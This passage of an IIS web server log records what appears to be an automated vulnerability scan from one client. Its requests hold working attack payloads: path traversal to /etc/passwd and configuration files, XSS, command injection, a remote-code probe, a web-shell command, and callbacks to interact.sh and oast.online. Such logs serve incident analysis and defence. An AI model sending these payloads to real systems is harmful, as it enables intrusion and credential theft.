Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 390 2023-11-09 13:56:54 103.153.214.94 GET /index.php option=com_pro_desk&include_file=../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 385 2023-11-09 13:56:54 103.153.214.94 GET /index.php option=com_jeformcr&view=../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 396 2023-11-09 13:57:16 103.153.214.94 GET /api.php action=logout&forward=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 0 2 394 2023-11-09 13:58:11 103.153.214.94 GET /index.php option=com_janews&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 64 8449 2023-11-09 13:58:36 103.153.214.94 GET /cs.html url=http://www.interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 384 2023-11-09 13:58:44 103.153.214.94 GET /index.php option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 363 2023-11-09 13:59:00 103.153.214.94 GET /index.php option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 375 2023-11-09 13:59:11 103.153.214.94 GET /index.php option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 379 2023-11-09 13:59:15 103.153.214.94 GET /comm.php id=../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 391 2023-11-09 13:59:20 103.153.214.94 GET /viewrq.php format=ps&var_filename=../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 1174 2023-11-09 13:59:22 103.153.214.94 GET /cgi-bin/kerbynet Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 411 2023-11-09 13:59:25 103.153.214.94 GET /horde/util/barcode.php type=../../../../../../../../../../../etc/./passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 388 2023-11-09 13:59:40 103.153.214.94 GET /index.php option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 375 2023-11-09 13:59:50 103.153.214.94 GET /CFIDE/wizards/common/_logintowizard.cfm %22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 382 2023-11-09 13:59:53 103.153.214.94 GET /adm/file.cgi next_file=%2fetc%2fpasswd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 390 2023-11-09 13:59:57 103.153.214.94 POST /scripts/setup.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 366 2023-11-09 13:59:57 103.153.214.94 GET /index.php option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 387 2023-11-09 14:00:09 103.153.214.94 GET /index.php option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 390 2023-11-09 14:00:21 103.153.214.94 GET /components/com_moofaq/includes/file_includer.php gzip=0&file=/../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 1154 2023-11-09 14:00:35 103.153.214.94 GET /index.php option=com_projectfork§ion=../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 389 2023-11-09 14:00:45 103.153.214.94 GET /index.php option=com_svmap&controller=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 398 2023-11-09 14:01:13 103.153.214.94 GET /index.php option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 393 2023-11-09 14:01:36 103.153.214.94 GET /index.php option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 388 2023-11-09 14:01:44 103.153.214.94 GET /index.php option=com_sebercart&view=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 1173 2023-11-09 14:02:18 103.153.214.94 GET /index.php option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 382 2023-11-09 14:02:21 103.153.214.94 GET /index.php option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 3873 2023-11-09 14:02:23 103.153.214.94 GET /index.php option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 380 2023-11-09 14:02:24 103.153.214.94 GET /index.php option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 388 2023-11-09 14:02:24 103.153.214.94 GET /index.php option=com_jresearch&controller=../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 1124 2023-11-09 14:03:07 103.153.214.94 GET /index.php option=com_omphotogallery&controller=../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 401 2023-11-09 14:03:23 103.153.214.94 GET /adm/krgourl.php DOCUMENT_ROOT=http://cl6dv9kfe7kal21qpargw5s67rpuxgrqz.oast.online 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 398 2023-11-09 14:04:00 103.153.214.94 GET /index.php option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 385 2023-11-09 14:04:08 103.153.214.94 GET /index.php option=com_kif_nexus&controller=../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 380 2023-11-09 14:04:10 103.153.214.94 GET /status full=true 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 390 2023-11-09 14:04:31 103.153.214.94 GET /index.php option=com_loginbox&view=../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 1191 2023-11-09 14:04:40 103.153.214.94 GET /index.php option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 411 2023-11-09 14:05:12 103.153.214.94 GET /wgarcmin.cgi NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 382 2023-11-09 14:05:22 103.153.214.94 GET /index.php option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 410 2023-11-09 14:05:27 103.153.214.94 GET /index.php option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 379 2023-11-09 14:05:29 103.153.214.94 GET /index.php option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 1173 2023-11-09 14:05:45 103.153.214.94 GET /index.php option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 365 2023-11-09 14:05:53 103.153.214.94 GET /index.php option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 373 2023-11-09 14:05:56 103.153.214.94 GET /index.php option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 1066 2023-11-09 14:06:00 103.153.214.94 GET /awstats/awredir.pl url=interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 375 2023-11-09 14:06:00 103.153.214.94 GET /plugins/content/jw_allvideos/includes/download.php file=../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 382 2023-11-09 14:06:01 103.153.214.94 GET /cgi-bin/awstats/awredir.pl url=interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 387 2023-11-09 14:06:08 103.153.214.94 GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php files[]=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 413 2023-11-09 14:06:13 103.153.214.94 GET /index.php option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 402 2023-11-09 14:06:56 103.153.214.94 GET /index.php option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 383 2023-11-09 14:07:23 103.153.214.94 GET /index.php option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 374 2023-11-09 14:07:39 103.153.214.94 GET /index.php option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 383 2023-11-09 14:07:52 103.153.214.94 GET /index.php option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 382 2023-11-09 14:07:58 103.153.214.94 POST /axis2-admin/login - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 384 2023-11-09 14:07:58 103.153.214.94 GET /index.php option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 383 2023-11-09 14:08:05 103.153.214.94 POST /axis2/axis2-admin/login - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 2006 2023-11-09 14:08:07 103.153.214.94 GET /index.php option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 382 2023-11-09 14:08:11 103.153.214.94 GET /index.php option=com_jcollection&controller=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 360 2023-11-09 14:08:16 103.153.214.94 GET /index.php option=com_gcalendar&controller=../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 425 2023-11-09 14:08:37 103.153.214.94 GET /index.php option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 374 2023-11-09 14:08:48 103.153.214.94 GET /index.php option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 381 2023-11-09 14:08:53 103.153.214.94 GET /index.php option=com_cartweberp&controller=../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 374 2023-11-09 14:08:59 103.153.214.94 GET /index.php option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 376 2023-11-09 14:08:59 103.153.214.94 GET /index.php option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 381 2023-11-09 14:09:13 103.153.214.94 GET /index.php option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 389 2023-11-09 14:09:19 103.153.214.94 GET /index.php option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 413 2023-11-09 14:09:21 103.153.214.94 GET /index.php option=com_jeformcr&view=../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 391 2023-11-09 14:09:29 103.153.214.94 GET /index.php option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 1138 2023-11-09 14:09:46 103.153.214.94 GET /index.php option=com_janews&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 379 2023-11-09 14:10:10 103.153.214.94 GET /index.php option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 1143 2023-11-09 14:10:19 103.153.214.94 GET /index.php option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 1199 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-09 15:04:23 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-09 15:04:23 103.153.214.94 GET /seeyon/webmail.do method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 977 2023-11-09 15:04:23 103.153.214.94 GET /jshERP-boot/user/getAllList;.ico - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 386 2023-11-09 15:04:23 103.153.214.94 GET /install/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 1389 2023-11-09 15:04:24 103.153.214.94 GET /backup/auto.php password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 359 2023-11-09 15:04:24 103.153.214.94 POST /WEB_VMS/LEVEL15/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 368 2023-11-09 15:04:26 103.153.214.94 POST /bsh.servlet.BshServlet - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 389 2023-11-09 15:04:26 103.153.214.94 GET /tool/log/c.php strip_slashes=printf&host=nl+c.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 4394 2023-11-09 15:04:26 103.153.214.94 GET /s=set&_method=__construct&method=*&filter[]=system - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 388 2023-11-09 15:04:26 103.153.214.94 GET /include/thumb.php dir=http\..\admin\login\login_check.php 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 387 2023-11-09 15:04:33 103.153.214.94 POST /index.php s=/home/page/uploadImg 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 391 2023-11-09 15:05:48 103.153.214.94 GET /login.do message=998235*948810 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 386 2023-11-09 15:05:50 103.153.214.94 GET /login/login.do message=998235*948810 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 394 2023-11-09 15:05:52 103.153.214.94 GET /api/v1/GetSrc - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 0 2 2808 2023-11-09 15:05:54 103.153.214.94 POST /seeyon/htmlofficeservlet - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 3125 2023-11-09 15:06:03 103.153.214.94 GET /seeyon/test123456.jsp pwd=asasd3344&2XwZKmbLDjgDfHUj7F480Y8YxPC=ipconfig 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 1156 2023-11-09 15:06:25 103.153.214.94 GET /common/download/resource resource=/profile/../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 406 2023-11-09 15:06:29 103.153.214.94 GET /common/download/resource resource=/profile/../../../../Windows/win.ini 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 388 2023-11-09 15:06:34 103.153.214.94 POST /public/index.php/material/Material/_download_imgage media_id=1&picUrl=./../config/database.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 384 2023-11-09 15:06:40 103.153.214.94 GET /public/index.php/home/file/user_pics - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 396 2023-11-09 15:09:51 103.153.214.94 GET /authenticationserverservlet - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 390 2023-11-09 15:09:52 103.153.214.94 GET /get_dkey.php user=admin 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 386 2023-11-09 15:09:55 103.153.214.94 GET /public/index.php s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 395 2023-11-09 15:09:58 103.153.214.94 GET /web/xml/webuser-auth.xml - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 399 2023-11-09 15:10:02 103.153.214.94 GET /e/ViewImg/index.html url=javascript:alert(1) 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 393 2023-11-09 15:10:26 103.153.214.94 POST /webadm/ q=moni_detail.do&action=gragh 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 387 2023-11-09 15:12:22 103.153.214.94 POST 